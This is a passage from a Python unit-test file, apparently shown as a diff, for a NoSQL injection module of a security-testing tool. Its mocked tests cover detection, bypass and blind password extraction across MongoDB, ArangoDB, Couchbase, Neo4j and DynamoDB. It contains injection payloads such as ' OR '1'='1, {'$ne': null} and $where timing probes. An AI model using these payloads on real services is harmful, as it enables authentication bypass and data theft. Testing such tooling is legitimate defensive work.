        template = ni._fetchValue("GET", "password", ni.NOSQL_SENTINEL + "' OR '1'='1")
        self.assertEqual(ni._extract(template, fetch, lengthValue, charValue), SECRET)
+
+
def _aql(place, parameter, value):
    """Mock of ni._fetchValue for an ArangoDB AQL string break-out: an =~ '^...' clause matches when
    its pattern is found in SECRET, otherwise only the '1'=='1 tautology matches"""

    # the regex body inside =~ '...'
    found = re.search(r"=~ '(\^[^']*)'", value)
    if found:
        # ArangoDB =~ is a partial (unanchored) match
        try:
            matched = re.search(found.group(1), SECRET) is not None
        except re.error:
            return NOMATCH
        return MATCH if matched else NOMATCH

    return MATCH if "'1'=='1" in value else NOMATCH
+
+
class TestNoSqlArango(unittest.TestCase):
    """ArangoDB AQL string break-out: detection and =~ driven blind extraction against the `_aql`
    mock"""

    def setUp(self):
        # swap the HTTP layer for the mock; restored in tearDown()
        self._orig = ni._fetchValue
        ni._fetchValue = _aql

    def tearDown(self):
        ni._fetchValue = self._orig

    def test_detect(self):
        self.assertTrue(ni._detectAQL("GET", "password"))

    def test_extract(self):
        fetch = lambda v: ni._fetchValue("GET", "password", v)
        lengthValue = lambda n: "%s' || (u.password =~ '^.{%d,}') || '1'=='2" % (ni.NOSQL_SENTINEL, n)
        charValue = lambda known, klass: "%s' || (u.password =~ '^%s%s') || '1'=='2" % (ni.NOSQL_SENTINEL, ni._javaEscape(known), klass)

        template = ni._fetchValue("GET", "password", ni.NOSQL_SENTINEL + "' || '1'=='1")
        self.assertEqual(ni._extract(template, fetch, lengthValue, charValue), SECRET)
+
+
def _n1ql(place, parameter, value):
    """Mock of ni._fetchValue for a Couchbase N1QL string break-out: REGEXP_CONTAINS(..., '...')
    matches when its pattern is found in SECRET, any '=~' yields an engine error and otherwise only
    the '1'='1 tautology matches"""

    found = re.search(r"REGEXP_CONTAINS\([^,]+, '([^']*)'\)", value)
    if found:
        # model the single-quoted string layer (collapse the doubled backslashes)
        pattern = found.group(1).replace("\\\\", "\\")
        try:
            matched = re.search(pattern, SECRET) is not None
        except re.error:
            return NOMATCH
        return MATCH if matched else NOMATCH

    # N1QL has no =~ operator -> engine error
    if "=~" in value:
        return "error: syntax error near '=~'"

    return MATCH if "'1'='1" in value else NOMATCH
+
+
class TestNoSqlN1QL(unittest.TestCase):
    """Couchbase N1QL shares the ' OR '1'='1 break-out with Neo4j; _resolve() must disambiguate by the
    regexp-match primitive (=~ fails, REGEXP_CONTAINS works) and still extract"""

    def setUp(self):
        self._f, self._fv = ni._fetch, ni._fetchValue
        # remembered so tearDown() can undo the override (otherwise it leaks into later tests)
        self._parameters = getattr(ni.conf, "parameters", None)

        ni._fetch = lambda *args, **kwargs: ""      # keep MongoDB operator detection out of the way
        ni._fetchValue = _n1ql
        ni.conf.parameters = {"GET": "name=luther&password=x"}

    def tearDown(self):
        ni._fetch, ni._fetchValue = self._f, self._fv
        ni.conf.parameters = self._parameters

    def test_resolve_disambiguates_couchbase(self):
        vector = ni._resolve("GET", "password", "password")
        self.assertEqual(vector.dbms, "Couchbase")
        self.assertEqual(vector.bypass, "' OR '1'='1")

    def test_extract(self):
        vector = ni._resolve("GET", "password", "password")
        self.assertEqual(ni._extract(vector.template, vector.fetch, vector.lengthValue, vector.charValue, vector.truth), SECRET)
+
+
def _whereTruth(payload):
    """Emulates the $where timing oracle: a payload "delays" (=> True) iff its embedded JavaScript
    condition - a 'length>=N' check or a /^.../.test() prefix match - holds for SECRET"""

    lengthCheck = re.search(r"length>=(\d+)", payload)
    if lengthCheck:
        return len(SECRET) >= int(lengthCheck.group(1))

    prefixCheck = re.search(r"/\^([^/]*)/\.test", payload)
    if prefixCheck:
        return re.search("^" + prefixCheck.group(1), SECRET) is not None

    return False
+
+
class TestNoSqlWhere(unittest.TestCase):
    """MongoDB $where time-based: validates the server-side-JS payload shapes and the time-based
    extraction loop (timing predicate emulated deterministically)"""

    def setUp(self):
        # remembered so tearDown() can undo the override (otherwise it leaks into later tests)
        self._timeSec = getattr(ni.conf, "timeSec", None)
        ni.conf.timeSec = 5

    def tearDown(self):
        ni.conf.timeSec = self._timeSec

    def test_extract(self):
        key = "password"
        lengthValue = lambda n: ni._whereDelay("d.%s&&d.%s.length>=%d" % (key, key, n))
        charValue = lambda known, klass: ni._whereDelay("d.%s&&/^%s%s/.test(d.%s)" % (key, ni._javaEscape(known), klass, key))
        self.assertEqual(ni._extract(None, None, lengthValue, charValue, _whereTruth), SECRET)
+
+
def _jswhere(place, parameter, value):
    """Mock of ni._fetchValue for a content-bearing MongoDB $where (server-side JavaScript) endpoint.
    Checks are applied in order: non-JS syntax, the /re/.test('x') disambiguation probe, prefix
    extraction on this.password, the length search, then the always-true payloads"""

    # not valid JS -> consistent (non-diverging) error
    if " OR " in value or " =~ " in value:
        return ""

    # JS regexp-test disambiguation probe
    probe = re.search(r"/(.)/\.test\('x'\)", value)
    if probe:
        return MATCH if re.search(probe.group(1), "x") is not None else NOMATCH

    # value extraction
    prefix = re.search(r"/\^([^/]*)/\.test\(this\.password\)", value)
    if prefix:
        try:
            matched = re.search("^" + prefix.group(1), SECRET) is not None
        except re.error:
            return NOMATCH
        return MATCH if matched else NOMATCH

    # length search
    length = re.search(r"length>=(\d+)", value)
    if length:
        return MATCH if len(SECRET) >= int(length.group(1)) else NOMATCH

    # boolean detection / bound always-true template
    if "'1'=='1" in value or "this.password)" in value:
        return MATCH

    return NOMATCH
+
+
class TestNoSqlWhereContent(unittest.TestCase):
    """Content-bearing MongoDB $where shares the ' || '1'=='1 break-out with ArangoDB; _resolve() must
    disambiguate (AQL '=~' fails, a JS /re/.test() holds) and extract via the content oracle"""

    def setUp(self):
        self._f, self._fv = ni._fetch, ni._fetchValue
        # remembered so tearDown() can undo the override (otherwise it leaks into later tests)
        self._parameters = getattr(ni.conf, "parameters", None)

        ni._fetch = lambda *args, **kwargs: ""      # keep MongoDB operator detection out of the way
        ni._fetchValue = _jswhere
        ni.conf.parameters = {"GET": "username=luther&password=x"}

    def tearDown(self):
        ni._fetch, ni._fetchValue = self._f, self._fv
        ni.conf.parameters = self._parameters

    def test_resolve_where_content(self):
        vector = ni._resolve("GET", "password", "password")
        self.assertEqual(vector.dbms, "MongoDB ($where)")
        self.assertEqual(vector.bypass, "' || '1'=='1")

    def test_extract(self):
        vector = ni._resolve("GET", "password", "password")
        self.assertEqual(ni._extract(vector.template, vector.fetch, vector.lengthValue, vector.charValue, vector.truth), SECRET)
+
+
class TestNoSqlWhereDump(unittest.TestCase):
    """$where whole-document dump: Object.keys(d) enumeration drives name + value recovery for every
    field (per-field char recovery itself is covered by TestNoSqlWhere)"""

    DOC = [("id", "1"), ("username", "luther"), ("password", "s3cr3t"), ("role", "admin")]

    def setUp(self):
        self._orig = ni._whereField
        fieldNames = [pair[0] for pair in self.DOC]
        fieldValues = dict(self.DOC)

        def fake(place, parameter, bound, expr, threshold):
            # answer straight from DOC according to the expression being "extracted"
            byIndex = re.search(r"Object\.keys\(d\)\[(\d+)\]", expr)
            if byIndex:
                position = int(byIndex.group(1))
                if position < len(fieldNames):
                    return fieldNames[position]
                return None

            byName = re.search(r"d\['([^']*)'\]", expr)
            if byName:
                return fieldValues.get(byName.group(1))

            return None

        ni._whereField = fake

    def tearDown(self):
        ni._whereField = self._orig

    def test_dump(self):
        columns, rows = ni._whereDump("GET", "password", "", 0)
        self.assertEqual(columns, ["id", "username", "password", "role"])
        self.assertEqual(rows, [["1", "luther", "s3cr3t", "admin"]])

    def test_empty_document(self):
        # no field name recoverable -> nothing to dump
        ni._whereField = lambda *args, **kwargs: None
        self.assertIsNone(ni._whereDump("GET", "password", "", 0))
+
+
class TestNoSqlEnumDump(unittest.TestCase):
    """Content-based whole-document dump (e.g. Neo4j keys(u)): enumerate field names then values"""

    DOC = [("id", "1"), ("username", "luther"), ("password", "s3cr3t"), ("role", "admin")]

    def setUp(self):
        self._ef, self._fv = ni._enumField, ni._fetchValue
        ni._fetchValue = lambda *args, **kwargs: "Welcome"      # non-error single-record template
        fieldNames = [pair[0] for pair in self.DOC]
        fieldValues = dict(self.DOC)

        def fake(place, parameter, template, payloadFor):
            # render once to inspect the target expression
            rendered = payloadFor("X")

            # keys/ATTRIBUTES/OBJECT_NAMES(u)[i]
            byIndex = re.search(r"\(u\)\[(\d+)\]", rendered)
            if byIndex:
                position = int(byIndex.group(1))
                if position < len(fieldNames):
                    return fieldNames[position]
                return None

            # toString/TO_STRING/TOSTRING(u['name'])
            byName = re.search(r"u\['([^']*)'\]", rendered)
            if byName:
                return fieldValues.get(byName.group(1))

            return None

        ni._enumField = fake

    def tearDown(self):
        ni._enumField, ni._fetchValue = self._ef, self._fv

    def _check(self, keysExpr, valueExpr):
        makePayload = lambda expr, rb: "X' OR %s =~ '^%s.*" % (expr, rb)
        columns, rows = ni._enumDump("GET", "password", makePayload, keysExpr, valueExpr)
        self.assertEqual(columns, ["id", "username", "password", "role"])
        self.assertEqual(rows, [["1", "luther", "s3cr3t", "admin"]])

    def test_cypher(self):
        self._check(lambda i: "keys(u)[%d]" % i, lambda n: "toString(u[%s])" % ni._propLiteral(n))

    def test_aql(self):
        self._check(lambda i: "ATTRIBUTES(u)[%d]" % i, lambda n: "TO_STRING(u[%s])" % ni._propLiteral(n))

    def test_n1ql(self):
        self._check(lambda i: "OBJECT_NAMES(u)[%d]" % i, lambda n: "TOSTRING(u[%s])" % ni._propLiteral(n))
+
+
class TestNoSqlBypass(unittest.TestCase):
    """Confirmed injection must surface the always-true (authentication/filter bypass) payload"""

    def setUp(self):
        # swap the HTTP layer for the MongoDB mock; restored in tearDown()
        self._f = ni._fetch
        ni._fetch = _mongo

    def tearDown(self):
        ni._fetch = self._f

    def test_mongo_bypass(self):
        resolved = ni._resolve("GET", "password", "password")
        self.assertEqual(resolved.dbms, "MongoDB")
        self.assertEqual(resolved.bypass, '{"$ne": null}')
+
+
+class TestNoSqlInband(unittest.TestCase):
+    """In-band exposure gate: _inband() returns the always-true response only when it carries
+    materially more reflected content than the original request"""
+
+    def setUp(self):
+        self._fv = ni._fetchValue
+        ni.conf.parameters = {"GET": "id=1"}
+
+    def tearDown(self):
+        ni._fetchValue = self._fv
+
+    def test_exposure_detected(self):
+        # NOTE(review): both fixtures were empty strings here, which cannot express "always-true
+        # response carries more content than the original"; the table markup is a reconstruction
+        # (presumably lost in extraction) - confirm against the intended fixtures
+        original = "<table><tr><td>1</td><td>luther</td></tr></table>"  # original (one row)
+        ni._fetchValue = lambda place, parameter, value: original
+        template = ("<table>"
+                    "<tr><td>1</td><td>luther</td></tr>"
+                    "<tr><td>2</td><td>fluffy</td></tr>"
+                    "<tr><td>3</td><td>wu</td></tr>"
+                    "<tr><td>4</td><td>admin</td></tr>"
+                    "<tr><td>5</td><td>guest</td></tr>"
+                    "</table>")  # always-true (every row)
+        self.assertEqual(ni._inband("GET", "id", template), template)
+
+    def test_no_exposure_when_not_larger(self):
+        ni._fetchValue = lambda place, parameter, value: "X" * 200  # original (large)
+        self.assertIsNone(ni._inband("GET", "id", "Welcome"))  # always-true smaller -> no dump
+
+
+class TestNoSqlRecords(unittest.TestCase):
+    """Reflected responses are parsed into (columns, rows) for a regular table dump"""
+
+    # NOTE(review): the two HTML fixtures below were found without any markup (pipe-separated
+    # text and an empty string), so they could not exercise HTML table parsing; the tags are a
+    # reconstruction from the expected columns/rows - confirm against the intended fixtures
+
+    def test_html_table_without_header(self):
+        # no <th> row: the expectation is positional column names (column_1, column_2, ...)
+        page = ("Results:<table>"
+                "<tr><td>1</td><td>luther</td><td>blisset</td></tr>"
+                "<tr><td>2</td><td>fluffy</td><td>bunny</td></tr>"
+                "</table>")
+        columns, rows = ni._records(page)
+        self.assertEqual(columns, ["column_1", "column_2", "column_3"])
+        self.assertEqual(rows, [["1", "luther", "blisset"], ["2", "fluffy", "bunny"]])
+
+    def test_html_table_with_header(self):
+        # the <th> cells are expected to become the column names
+        page = ("<table>"
+                "<tr><th>id</th><th>user</th></tr>"
+                "<tr><td>1</td><td>luther</td></tr>"
+                "</table>")
+        columns, rows = ni._records(page)
+        self.assertEqual(columns, ["id", "user"])
+        self.assertEqual(rows, [["1", "luther"]])
+
+    def test_json_array_of_objects(self):
+        # expectation: a JSON null is rendered as "NULL", a key missing from an object as ""
+        page = '{"results": [{"id": 1, "username": "luther", "password": null}, {"id": 2, "username": "fluffy"}]}'
+        columns, rows = ni._records(page)
+        self.assertEqual(columns, ["id", "username", "password"])
+        self.assertEqual(rows, [["1", "luther", "NULL"], ["2", "fluffy", ""]])
+
+    def test_unstructured_returns_none(self):
+        self.assertIsNone(ni._records("just some prose, no records here"))
+
+
+def _numeric(place, parameter, value):
+    # oracle for a numeric context: an 'OR 1=1' payload is always true (rows come back), an
+    # 'AND 1=2' payload is false (no rows); any other value matches only when it is exactly "1"
+    if "OR 1=1" in value:
+        matched = True
+    elif "AND 1=2" in value:
+        matched = False
+    else:
+        matched = value == "1"
+    return MATCH if matched else NOMATCH
+
+
+class TestNoSqlNumeric(unittest.TestCase):
+    """Break-out from a numeric (unquoted) context, e.g. 'WHERE id = <value>': detection relies on
+    OR/AND, and the always-true response is carried along as the in-band dump template"""
+
+    def setUp(self):
+        # keep the real fetchers so that tearDown() can put them back
+        self._f = ni._fetch
+        self._fv = ni._fetchValue
+        ni._fetch = lambda *args, **kwargs: ""
+        ni._fetchValue = _numeric
+        ni.conf.paramDict = {"GET": {"id": "1"}}
+        ni.conf.parameters = {"GET": "id=1"}
+
+    def tearDown(self):
+        ni._fetch = self._f
+        ni._fetchValue = self._fv
+
+    def test_resolve_numeric(self):
+        vector = ni._resolve("GET", "id", "id")
+        for attribute, expected in (("dbms", "Neo4j"), ("bypass", "1 OR 1=1")):
+            self.assertEqual(getattr(vector, attribute), expected)
+        self.assertIsNone(vector.lengthValue)  # numeric field -> in-band only, no blind extraction
+
+    def test_skips_non_numeric(self):
+        ni.conf.parameters = {"GET": "name=luther"}
+        detected = ni._detectNumeric("GET", "name")
+        self.assertIsNone(detected)  # only applies to a numeric field value
+
+
+def _numericN1ql(place, parameter, value):
+    # oracle for a numeric Couchbase context: a REGEXP_CONTAINS('ab', ...) probe is answered by
+    # running the captured pattern against 'ab'; everything else behaves like the OR/AND boolean
+    probe = re.search(r"REGEXP_CONTAINS\('ab', '([^']*)'\)", value)
+    if probe:
+        matched = re.search(probe.group(1), "ab") is not None
+    elif "OR 1=1" in value:
+        matched = True
+    elif "AND 1=2" in value:
+        matched = False
+    else:
+        matched = value == "1"
+    return MATCH if matched else NOMATCH
+
+
+class TestNoSqlNumericN1QL(unittest.TestCase):
+    """The N1QL-only REGEXP_CONTAINS probe is what tells a numeric Couchbase point from Neo4j"""
+
+    def setUp(self):
+        # keep the real fetchers so that tearDown() can put them back
+        self._f = ni._fetch
+        self._fv = ni._fetchValue
+        ni._fetch = lambda *args, **kwargs: ""
+        ni._fetchValue = _numericN1ql
+        ni.conf.parameters = {"GET": "id=1"}
+
+    def tearDown(self):
+        ni._fetch = self._f
+        ni._fetchValue = self._fv
+
+    def test_resolve_numeric_couchbase(self):
+        # the middle element of the result is not checked here
+        dbms, _, bypass = ni._detectNumeric("GET", "id")
+        self.assertEqual((dbms, bypass), ("Couchbase", "1 OR 1=1"))
+
+
+def _numericAql(place, parameter, value):
+    # oracle for a numeric ArangoDB context: nothing but the ||/&& family diverges, so OR/AND and
+    # REGEXP_CONTAINS payloads get the same (non-matching) answer as everything else
+    if "|| 1==1" in value:
+        return MATCH
+    return NOMATCH
+
+
+class TestNoSqlNumericAQL(unittest.TestCase):
+    """With OR/AND showing no divergence, a numeric ArangoDB point is found via the ||/&& family"""
+
+    def setUp(self):
+        # keep the real fetchers so that tearDown() can put them back
+        self._f = ni._fetch
+        self._fv = ni._fetchValue
+        ni._fetch = lambda *args, **kwargs: ""
+        ni._fetchValue = _numericAql
+        ni.conf.parameters = {"GET": "id=1"}
+
+    def tearDown(self):
+        ni._fetch = self._f
+        ni._fetchValue = self._fv
+
+    def test_resolve_numeric_arango(self):
+        # the middle element of the result is not checked here
+        dbms, _, bypass = ni._detectNumeric("GET", "id")
+        self.assertEqual((dbms, bypass), ("ArangoDB", "1 || 1==1"))
+
+
+def _partiql(place, parameter, value):
+    # oracle for a DynamoDB PartiQL string context, answering two payload shapes:
+    #   field >= 'prefix'           -> matches iff SECRET >= prefix (ordered comparison, which is
+    #                                  what the comparison-bisection extraction relies on)
+    #   begins_with(field, prefix)  -> matches iff SECRET starts with prefix
+    ordered = re.search(r">= '(.*)$", value)
+    if ordered:
+        prefix = ordered.group(1).replace("''", "'")  # undo the doubled-quote escaping
+        return MATCH if SECRET >= prefix else NOMATCH
+
+    begins = re.search(r"begins_with\([^,]+, '(.*?)'\) OR '1'='2", value)
+    if begins and SECRET.startswith(begins.group(1)):
+        return MATCH
+    return NOMATCH
+
+
+class TestNoSqlPartiQL(unittest.TestCase):
+    """DynamoDB PartiQL has no regexp engine, so a value is recovered through ordered string
+    comparison (field >= 'prefix') bisected over the printable-ASCII range"""
+
+    def _request(self, query):
+        # describe the request under test: raw GET query string plus the tested parameter
+        ni.conf.parameters = {"GET": query}
+        ni.conf.paramDict = {"GET": {"password": "x"}}
+
+    def setUp(self):
+        self._fv, ni._fetchValue = ni._fetchValue, _partiql
+        self._request("username=luther&password=x")
+
+    def tearDown(self):
+        ni._fetchValue = self._fv
+
+    def test_extract(self):
+        recovered = ni._partiqlValue("GET", "password", "", "password")
+        self.assertEqual(recovered, SECRET)
+
+    def test_dump_binds_sibling(self):
+        dumped = ni._partiqlDump("GET", "password", "password")
+        columns, rows = dumped
+        self.assertEqual(columns, ["password"])
+        self.assertEqual(rows, [[SECRET]])
+
+    def test_dump_without_sibling_returns_none(self):
+        self._request("password=x")  # no sibling to pin a single record
+        dumped = ni._partiqlDump("GET", "password", "password")
+        self.assertIsNone(dumped)
+
+
+def _numericDdb(place, parameter, value):
+    # oracle for a numeric DynamoDB context: a begins_with('ab', ...) probe is answered by testing
+    # the captured prefix against 'ab'; everything else behaves like the OR/AND boolean
+    probe = re.search(r"begins_with\('ab', '([^']*)'\)", value)
+    if probe:
+        matched = "ab".startswith(probe.group(1))
+    elif "OR 1=1" in value:
+        matched = True
+    elif "AND 1=2" in value:
+        matched = False
+    else:
+        matched = value == "1"
+    return MATCH if matched else NOMATCH
+
+
+class TestNoSqlNumericDynamoDB(unittest.TestCase):
+    """The PartiQL-only begins_with probe is what tells a numeric DynamoDB point from Neo4j/Couchbase"""
+
+    def setUp(self):
+        # keep the real fetchers so that tearDown() can put them back
+        self._f = ni._fetch
+        self._fv = ni._fetchValue
+        ni._fetch = lambda *args, **kwargs: ""
+        ni._fetchValue = _numericDdb
+        ni.conf.parameters = {"GET": "id=1"}
+
+    def tearDown(self):
+        ni._fetch = self._f
+        ni._fetchValue = self._fv
+
+    def test_resolve_numeric_dynamodb(self):
+        # the middle element of the result is not checked here
+        dbms, _, bypass = ni._detectNumeric("GET", "id")
+        self.assertEqual((dbms, bypass), ("DynamoDB", "1 OR 1=1"))
+
+
+class TestNoSqlCookiePlace(unittest.TestCase):
+    """Cookie place: parameters are split/joined on ';' (not '&') and the segment is routed to
+    the Cookie header"""
+
+    def setUp(self):
+        cookie = ni.PLACE.COOKIE
+        # with cookieDel unset the delimiter is expected to be ';' (see test_delimiter)
+        ni.conf.cookieDel = None
+        ni.conf.parameters = {cookie: "session=abc; username=luther; password=x"}
+        ni.conf.paramDict = {cookie: {"password": "x"}}
+
+    def test_delimiter(self):
+        for place, expected in ((ni.PLACE.COOKIE, ";"), (ni.PLACE.GET, "&")):
+            self.assertEqual(ni._delim(place), expected)
+
+    def test_original_value(self):
+        value = ni._originalValue(ni.PLACE.COOKIE, "username")
+        self.assertEqual(value.strip(), "luther")
+
+    def test_replace_segment(self):
+        out = ni._replaceSegment(ni.PLACE.COOKIE, "password", "password[$ne]=zzz")
+        for segment in ("session=abc", "username=luther", "password[$ne]=zzz"):
+            self.assertIn(segment, out)
+        self.assertEqual(out.count(";"), 2)  # 3 segments -> 2 delimiters (no '&')
+        self.assertNotIn("&", out)
+
+    def test_constraint_binds_siblings(self):
+        constraint = ni._constraint(ni.PLACE.COOKIE, "password")
+        for binding in ("u.session='abc'", "u.username='luther'"):
+            self.assertIn(binding, constraint)
+
+
+class TestNoSqlErrorRegex(unittest.TestCase):
+    """The heuristic regex must match real back-end error structures, not bare product names (so an
+    article merely mentioning MongoDB/Elasticsearch/Cassandra is never flagged as injectable)"""
+
+    # imported in the class body, so the pattern is reachable as self.NOSQL_ERROR_REGEX
+    from lib.core.settings import NOSQL_ERROR_REGEX
+
+    # error samples the pattern has to match (checked by test_matches_real_errors)
+    POSITIVES = (
+        'MongoServerError: unknown operator: $foo',
+        '{"ok":0,"errmsg":"unknown top level operator: $where","code":2,"codeName":"BadValue"}',
+        'MongoServerError: Regular expression is invalid: missing )',
+        'CastError: Cast to ObjectId failed',
+        '{"error":"query_parse_error","reason":"Invalid operator: $foo"}',
+        '{"error":{"root_cause":[{"type":"query_shard_exception","reason":"Failed to parse query [luther\']"}]},"status":400}',
+        '{"type":"x_content_parse_exception","reason":"[1:18] [bool] failed to parse"}',
+        '{"error":{"msg":"org.apache.solr.search.SyntaxError: Cannot parse \'username:\'","code":400}}',
+        "Neo.ClientError.Statement.SyntaxError: Invalid input",
+        'Neo4j error: Failed to parse string literal. The query must contain an even number of non-escaped quotes. (line 1, column 30) "MATCH (u:User) WHERE u.id = 1"',
+        "Neo4j error: Invalid input ''x'': expected an expression, 'FOREACH', 'MATCH', 'MERGE', 'UNWIND', 'WITH' or ",
+        '{"error":true,"errorNum":1501,"errorMessage":"AQL: syntax error, unexpected quoted string"}',
+        "ResponseError: line 1:38 no viable alternative at input",
+        "SyntaxException: line 1:42 mismatched input ''' expecting EOF",
+        '{"error":{"root_cause":[{"type":"number_format_exception","reason":"For input string"}]},"status":400}',
+        'ReplyError: WRONGTYPE Operation against a key holding the wrong kind of value',
+        'ReplyError: ERR Error compiling script (new function): user_script:1: unexpected symbol',
+        'CLIENT_ERROR bad command line format',
+        'error parsing query: found WHERE, expected identifier at line 1',
+        'org.apache.phoenix.exception.PhoenixIOException: failed',
+    )
+
+    # benign text the pattern must leave alone (checked by test_ignores_benign_text)
+    NEGATIVES = (
+        "This article explains how MongoDB, CouchDB and Elasticsearch handle queries.",
+        "Cassandra and Redis are popular NoSQL databases; Neo4j is a graph database.",
+        "We migrated from Solr to OpenSearch last year. ArangoDB is multi-model.",
+        "Results:",
+        "Invalid credentials",
+    )
+
+    def test_matches_real_errors(self):
+        # the offending sample is put into the failure message
+        for sample in self.POSITIVES:
+            self.assertIsNotNone(re.search(self.NOSQL_ERROR_REGEX, sample), "should match: %s" % sample)
+
+    def test_ignores_benign_text(self):
+        # the offending sample is put into the failure message
+        for sample in self.NEGATIVES:
+            self.assertIsNone(re.search(self.NOSQL_ERROR_REGEX, sample), "should NOT match: %s" % sample)
+
+
+# run the test cases of this module when the file is executed directly
+if __name__ == "__main__":
+    unittest.main()
+
|